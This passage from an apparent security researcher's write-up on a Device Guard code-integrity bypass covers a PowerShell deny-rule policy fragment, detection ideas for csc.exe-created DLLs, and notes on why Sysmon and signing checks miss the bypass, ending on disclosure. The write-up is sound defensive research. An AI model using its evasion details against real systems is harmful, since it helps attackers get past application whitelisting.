    Rules = $DenyRule
    UserPEs = $True
}

New-CIPolicy @CIArgs

Detection

Unfortunately, detection using free, off-the-shelf tools will be difficult due to the fact that the disk artifacts are created and subsequently deleted, and because System.Reflection.Assembly.Load(byte[]) does not generate a traditional module load event that something like Sysmon would be able to detect.

Vendors with the ability to hash files on the spot should consider assessing the prevalence of DLLs created by csc.exe. Files with low prevalence should be treated as suspicious. Also, unfortunately, since dynamically created DLLs by their nature will not be signed, there will be no code signing heuristics to key off of.

It's worth noting that I intentionally didn't mention PowerShell v5 ScriptBlock logging as a detection option since PowerShell isn't actually required to achieve this bypass.

Conclusion

I remain optimistic about Device Guard's ability to enforce user mode code integrity. It is a difficult problem to tackle, however, and there is plenty of attack surface. In most cases, Device Guard UMCI bypasses can be mitigated by a user in the form of CI blacklist rules. Unfortunately, in my opinion, no realistic user mitigation of this particular bypass is possible. Microsoft not servicing such a bypass is the exception, not the norm. Please don't let this discourage you from reporting any bypasses that you may find to secure@microsoft.com. It is my hope that by releasing this bypass, it will eventually be addressed, and that other vendors will have the opportunity to mitigate it.

Previously serviced bypasses for reference: